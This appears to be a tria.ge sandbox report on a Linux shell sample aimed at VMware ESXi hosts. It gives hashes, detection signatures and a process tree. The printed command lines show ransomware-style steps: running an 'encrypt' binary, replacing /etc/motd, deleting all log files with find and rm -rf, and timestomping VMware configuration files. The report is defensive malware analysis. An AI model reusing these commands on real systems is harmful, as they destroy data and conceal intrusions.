Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

9

Static

static

1

e603944ace...bf2f05

ubuntu-18.04-amd64

9

e603944ace...bf2f05

debian-9-armhf

9

e603944ace...bf2f05

debian-9-mips

9

e603944ace...bf2f05

debian-9-mipsel

9

Analysis

  • max time kernel
    0s
  • max time network
    123s
  • platform
    linux_mips
  • resource
    debian9-mipsbe-en-20211208
  • resource tags

    arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    05/02/2023, 07:05 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e603944aceb5c0885a8627de12f36b159bbf2f05

  • Size

    3KB

  • MD5

    d0d36f169f1458806053aae482af5010

  • SHA1

    e603944aceb5c0885a8627de12f36b159bbf2f05

  • SHA256

    10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459

  • SHA512

    982abe39731d8cc852c25650740ff73975c10d19027eccf610401260e2f508334f1de656f8dd332fa698dccc9f7d3bda610c8b9e84d276036a6e9408d826229a

Score
9/10

Malware Config

Signatures

  • Writes file to system bin folder 1 TTPs 1 IoCs
  • Reads CPU attributes 1 TTPs 2 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/e603944aceb5c0885a8627de12f36b159bbf2f05
    /tmp/e603944aceb5c0885a8627de12f36b159bbf2f05
    1⤵
    • Writes file to tmp directory
    PID:325
    • /bin/chmod
      chmod +x /tmp//encrypt
      2⤵
        PID:339
      • /usr/bin/find
        find /usr/lib/vmware -type f -name index.html
        2⤵
          PID:344
        • /bin/mv
          mv /etc/motd /etc/motd1
          2⤵
            PID:345
          • /bin/cp
            cp /tmp//motd /etc/motd
            2⤵
            • Reads runtime system information
            PID:346
          • /bin/find
            /bin/find / -name "*.log" -exec /bin/rm -rf "{}" ";"
            2⤵
              PID:347
            • /bin/rm
              /bin/rm -f /store/packages/vmtools.py
              2⤵
                PID:357
              • /bin/touch
                /bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/vmware/rhttpproxy/endpoints.conf
                2⤵
                  PID:358
                • /bin/touch
                  /bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh
                  2⤵
                    PID:359
                  • /bin/touch
                    /bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/rc.local.d/local.sh
                    2⤵
                      PID:360
                    • /bin/rm
                      /bin/rm -f /tmp/encrypt /tmp/nohup.out /tmp/index.html /tmp/motd /tmp/public.pem /tmp/archieve.zip
                      2⤵
                      • Writes file to tmp directory
                      PID:361
                    • /bin/sh
                      /bin/sh /bin/auto-backup.sh
                      2⤵
                      • Writes file to system bin folder
                      PID:362
                    • /bin/rm
                      /bin/rm -- /tmp/e603944aceb5c0885a8627de12f36b159bbf2f05
                      2⤵
                      • Writes file to tmp directory
                      PID:363
                    • /etc/init.d/SSH
                      /etc/init.d/SSH start
                      2⤵
                        PID:364
                    • /bin/grep
                      grep "Config File"
                      1⤵
                        PID:330
                      • /usr/bin/awk
                        awk "{print \$3}"
                        1⤵
                          PID:331
                        • /bin/ps
                          ps
                          1⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:333
                        • /bin/grep
                          grep vmx
                          1⤵
                            PID:334
                          • /usr/bin/awk
                            awk "{print \$2}"
                            1⤵
                              PID:335
                            • /bin/grep
                              grep /vmfs/volumes/
                              1⤵
                                PID:342
                              • /usr/bin/awk
                                awk "-F " "{print \$2}"
                                1⤵
                                  PID:343
                                • /bin/wc
                                  /bin/wc -l
                                  1⤵
                                    PID:352
                                  • /bin/grep
                                    /bin/grep encrypt
                                    1⤵
                                      PID:350
                                    • /bin/ps
                                      /bin/ps
                                      1⤵
                                      • Reads CPU attributes
                                      • Reads runtime system information
                                      PID:349
                                    • /bin/grep
                                      /bin/grep -v grep
                                      1⤵
                                        PID:351
                                      • /bin/vmware
                                        /bin/vmware -l
                                        1⤵
                                          PID:354
                                        • /bin/grep
                                          /bin/grep " 7."
                                          1⤵
                                            PID:355
                                          • /bin/wc
                                            /bin/wc -l
                                            1⤵
                                              PID:356

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            We care about your privacy.

                                            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.